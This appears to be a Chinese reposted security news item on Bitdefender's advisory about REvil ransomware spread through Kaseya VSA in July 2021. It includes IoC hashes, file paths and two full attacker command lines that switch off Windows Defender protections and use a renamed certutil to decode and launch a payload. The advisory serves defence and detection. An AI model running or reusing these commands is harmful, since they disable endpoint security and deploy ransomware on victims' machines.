自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Bitdefender安全通告:黑客使用Kaseya IT管理軟件來分發(fā)REvil勒索病毒

作者:至頂網(wǎng)
安全
2021年7月3日美國東部時(shí)間上午10:00,遠(yuǎn)程IT管理軟件廠商Kaseya發(fā)布了緊急安全通告,Kaseya的VSA產(chǎn)品成為復(fù)雜網(wǎng)絡(luò)攻擊的受害者,攻擊者正在使用Kaseya來分發(fā)REvil勒索病毒。

2021 年 7 月 3 日美國東部時(shí)間上午 10:00 ,遠(yuǎn)程IT管理軟件廠商Kaseya發(fā)布了緊急安全通告,Kaseya 的 VSA 產(chǎn)品成為復(fù)雜網(wǎng)絡(luò)攻擊的受害者,攻擊者正在使用Kaseya來分發(fā)REvil勒索病毒。

[[409321]]

Kasaya安全通告:

“我們繼續(xù)強(qiáng)烈建議我們的本地客戶的 VSA 服務(wù)器保持關(guān)閉狀態(tài),直至另行通知。我們還將保持 SaaS 服務(wù)器離線,直至另行通知。

我們的外部專家建議我們,遇到勒索軟件并收到攻擊者通信的客戶不應(yīng)點(diǎn)擊任何鏈接——它們可能被武器化。”

公告原文:https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689

Bitdefender正在積極監(jiān)控和分析使用 Kaseya 發(fā)動(dòng)的高級攻擊,Bitdefender迄今為止的調(diào)查結(jié)果表明,Bitdefender 解決方案可檢測并阻止攻擊中使用的命令行操作和交付的惡意payload,從而保護(hù)Bitdefender客戶免受此次復(fù)雜的攻擊。

由于這是一個(gè)不斷變化的情況,我們將在可用時(shí)使用其他信息更新這篇文章。

Bitdefender 客戶指南:

  • Kaseya 安全公告, 懇請其客戶立即關(guān)閉本地 VSA 服務(wù)器。我們建議任何 Kaseya VSA 用戶立即遵循此指南。
  • 檢查本地和混合環(huán)境中的已知IoC指標(biāo) (IoC) - IoC 列表如下。
  • 美國網(wǎng)絡(luò)安全和基礎(chǔ)設(shè)施安全局 (CISA) 已 發(fā)布 警報(bào) ,稱他們正在監(jiān)控有關(guān)針對 Kaseya VSA 和使用 VSA 軟件的多個(gè) MSP 的攻擊的詳細(xì)信息。我們建議組織遵循 CISA 警報(bào)以獲取未來更新。

經(jīng)過驗(yàn)證的IoC指標(biāo) :

1. 從 Kaseya 代理執(zhí)行的命令行:

  1. C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 

  1. C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe 

2. 哈希:

  • 561cffbaba71a6e8cc1cdceda990ead4,Bitdefender 在 2021 年 5 月 15 日已檢測到,檢測為 Gen:Variant.Graftor.952042。這是使用 certutil.exe 加密的主要可執(zhí)行文件 ( c:\kworking\agent.exe)
  • a47cf00aedf769d60d58bfe00c0b5421,Bitdefender 在 2021 年 5 月13 日已檢測到,檢測為 Gen:Variant.Bulz.471680。這是一個(gè)由主可執(zhí)行文件投遞并使用 MS msmpeng.exe 可執(zhí)行文件側(cè)面加載的 DLL。
  • 0293a5d21081a94a5589976b407f5675 – agent.crt 的哈希值(agent.exe 解密前的內(nèi)容)。

3. 文件路徑:

  • c:\WarCoMWorking\agent.crt
  • c:\WarCoMWorking\agent.exe
  • c:\kworking\agent.exe
  • c:\kworking\agent.crt

c:\windows\msmpeng.exe(較舊的版本,容易受到 DLL 側(cè)加載的影響)。此版本被主要可執(zhí)行文件投遞,并進(jìn)一步用于加載 DLL (a47cf00aedf769d60d58bfe00c0b5421)。文件版本:MsMpEng.exe,Microsoft 惡意軟件保護(hù),4.5.0218.0

正在使用Bitdefender EDR的客戶,可以使用IOC掃描功能,在全網(wǎng)中地毯式搜索IOC指標(biāo):

添加黑名單規(guī)則:在黑名單區(qū)域,可以添加上述IOC的哈希,全網(wǎng)阻斷運(yùn)行:

 

責(zé)任編輯:趙寧寧 來源: 至頂網(wǎng)
黑客網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊
相關(guān)推薦

2021-07-06 14:22:50

勒索病毒

2021-07-08 15:51:26

Coop勒索軟件攻擊Kaseya

2021-09-17 13:27:09

勒索病毒

2021-07-06 13:55:32

REvil勒索軟件漏洞

2017-06-28 02:25:23

2021-07-07 10:40:49

勒索軟件攻擊贖金

2021-06-22 19:56:13

勒索病毒

2017-07-05 11:23:38

勒索病毒網(wǎng)絡(luò)安全企業(yè)數(shù)據(jù)

2009-04-02 13:49:58

Kaseya終端管理IT服務(wù)

2017-05-13 15:20:51

2021-08-10 11:42:45

勒索軟件網(wǎng)絡(luò)攻擊數(shù)據(jù)泄露

2022-01-17 12:44:15

勒索軟件REvil惡意軟件

2021-04-24 09:39:26

勒索軟件蘋果威脅泄露

2021-09-10 09:54:38

勒索軟件REvil

2021-07-11 17:31:13

勒索軟件攻擊Kaseya

2020-05-22 09:40:51

勒索軟件黑客暗網(wǎng)

2021-07-05 18:50:22

供應(yīng)鏈攻擊勒索軟件漏洞

2021-09-14 14:55:17

REvil勒索軟件網(wǎng)絡(luò)攻擊

2021-10-04 19:06:12

REvil勒索軟件黑吃黑

2010-05-31 14:56:59

SVN版本管理軟件
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號